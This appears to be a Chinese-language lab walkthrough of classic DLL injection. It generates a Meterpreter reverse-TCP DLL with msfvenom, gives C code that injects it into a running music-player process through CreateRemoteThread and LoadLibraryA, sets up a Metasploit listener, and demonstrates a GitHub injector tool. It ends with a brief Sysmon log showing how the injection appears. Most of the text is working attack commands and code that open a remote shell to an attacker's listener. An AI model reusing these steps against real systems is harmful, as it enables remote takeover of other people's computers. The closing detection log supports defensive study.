1. 概述

比较经典的注入

2. 实现

2.1 生成dll马

使用msfvenom生成dll马

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.132 LPORT=1234 -f dll > 1.dll

image.png

2.2 Dll劫持代码

在这里,使用的是c程序,扩展名为.c,改为.cpp的话编译会报错,我们将恶意DLL注入到网易云音乐进程中,建议选择应用层的程序,不建议直接选择系统层的程序,其PID为17324
image.png
相应的代码如下:

  1. #include <stdio.h>
  2. #include <windows.h>
  3. #include <string.h>
  4. int main(){
  5. HANDLE hprocess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,17324);
  6. LPVOID dllpath="C:\\Users\\Administrator\\Desktop\\1.dll";
  7. FARPROC load=GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA");
  8. char pszLibFileRemote = (char ) VirtualAllocEx(hprocess,NULL,strlen(dllpath)+1,MEM_COMMIT,PAGE_READWRITE);
  9. WriteProcessMemory(hprocess, pszLibFileRemote, (PVOID) dllpath, strlen(dllpath)+1, NULL); CreateRemoteThread(hprocess, NULL, 0,(LPTHREAD_START_ROUTINE)load, pszLibFileRemote, 0, NULL); return 0;
  10. }

image.png

2.3 编译并执行

image.png

2.4 配置监听

  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set lhost 192.168.5.132
  4. set lport 1234
  5. run

image.png

2.5 运行DLL马

运行以后马立马反弹过来了
image.png

3. 使用工具进行注入

这里面使用工具进行注入,https://github.com/al1ex/remotedllinjector
使用比较简单
image.png

注入的命令如下:

  1. C:\Documents and Settings\Administrator\桌\RemoteDLLInjector-main>RemoteDLLInj
  2. ector32.exe 1540 "C:\Documents and Settings\Administrator\桌面\RemoteDLLInjector
  3. -main\1.dll"

image.png
效果
image.png

4. 分析

4.1 特点
注入到网易应用程序中,但是却是使用rundll32.exe进行加载
4.2 日志
image.png

  1. CreateRemoteThread detected:
  2. RuleName:
  3. UtcTime: 2021-01-24 10:36:13.692
  4. SourceProcessGuid: {370d983c-4d9d-600d-0000-0010c76e8306}
  5. SourceProcessId: 5428
  6. SourceImage: F:\360同步文件\安全学习\1.内网安全\1.MSF系列\02.MSF实战案例\7.DLL注入\2.Dll注入研究\1.经典DLL劫持\Debug\dllinject.exe
  7. TargetProcessGuid: {370d983c-3581-600d-0000-00109b08f304}
  8. TargetProcessId: 17324
  9. TargetImage: D:\Program Files (X86)\网易云音乐\网易云音乐PC\cloudmusic.exe
  10. NewThreadId: 10044
  11. StartAddress: 0x00000000759D2A40
  12. StartModule: C:\WINDOWS\System32\KERNEL32.DLL
  13. StartFunction: LoadLibraryA

4.3 进程
image.png